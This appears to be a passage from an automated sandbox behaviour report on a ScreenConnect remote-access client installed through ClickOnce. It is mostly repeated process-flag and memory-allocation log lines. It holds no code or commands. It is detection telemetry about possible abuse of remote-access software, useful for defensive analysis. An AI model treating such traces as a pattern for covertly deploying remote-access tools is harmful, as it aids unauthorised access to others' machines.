                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 23CCA640000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 23CE4130000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeMemory allocated: 9A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeMemory allocated: 1A3A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeMemory allocated: 1D50000 memory reserve | memory write watchJump to behavior
